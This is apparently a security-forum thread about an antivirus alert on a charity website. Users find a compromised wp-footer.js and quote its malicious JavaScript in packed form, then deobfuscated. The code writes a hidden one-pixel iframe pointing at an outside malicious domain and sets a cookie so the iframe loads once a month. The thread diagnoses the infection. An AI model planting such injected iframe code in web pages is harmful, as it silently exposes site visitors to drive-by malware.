Rivers Without Borders

I am getting a warning on the riverswithoutborders.org site

Sign of HTML:IFrame-IV [Trj} has been found…

Is this a false positive? I wouldn’t think this site owuld be malicious.

I found the aller too, it said the infected part: hXXp://riverswithoutborders.org/home/wp-footer.js (A java script on the footer section).

I hope this topic gives some help: http://forum.avast.com/index.php?topic=45005.0

@jnkyrd

Please read:
Every 3.6 seconds a website is infected
http://forum.avast.com/index.php?topic=47096.0

yes wp-footer.js contains :


 eval(function(p,a,c,k,e,d)
 {
   while(c--)
   {
     if(k[c])
     {
       p=p.replace(new RegExp('\\b'+c.toString(a)+'\\b','g'),k[c])
     }
     
   }
   return p
 }
 ('f 4=6 5(),2=6 5(4.d()+g);
 c(0.7.9("8=1")==-1)
 {
   0.b("<3 a=1 e=1 o=\'n://h-q.m/l/\' i=\'j:k\'></3>");
   0.7="8=1;
   "+" 2="+2.p()+";
   "
 }
 ',27,27,'document||expires|iframe|today|Date|new|cookie|_ubit|indexOf|width|write|if|getTime|height|var|2678400000|loading|style|display|none|b2b|net|http|src|toGMTString|nso'.split('|')))

deobfuscation results in :


var today = new Date(), expires = new Date(today.getTime() + 2678400000);
if (document.cookie.indexOf("_ubit=1") ==- 1){
  document.write("
<iframe width=1 height=1 src='hxxp://loading-nso.net/b2b/' style='display:none'></iframe>"
  );
  document.cookie = "_ubit=1;" + " expires=" + expires.toGMTString() + "; "
}

the site is infected.

js contains eval function.

edit : see the iframe in second code.

do not quote reply #3 because the iframe in the second code triggers avast!

nmb,

It doesn’t for me The standardshield alerts when I visit this page, please modifiy it… but I wouldn’t post the full iframe…

to prevent the alert, do what I do, and post a screenshot of the alert or edit the iframe to disable it when you post it in code

This would remove the potential for an alert

-Scott-

@scott

have you set the webshield to normal or high?

edit : changed to hxxp.

Everything is at high…

As you can see above, I did get an alert, just not the webshield, although I don’t seem to be getting them anymore…

This is why i post pics instead of the code…

now that i have changed to hxxp, is it trigerring?.

considered! next time, i’ll post pictures. thank you. :slight_smile:

Not sure, I was getting alerts in the sessionstore.js file until I cleared the browser cache and everything else…we’ll see for now…

yes you are rite… in sessionstore.js.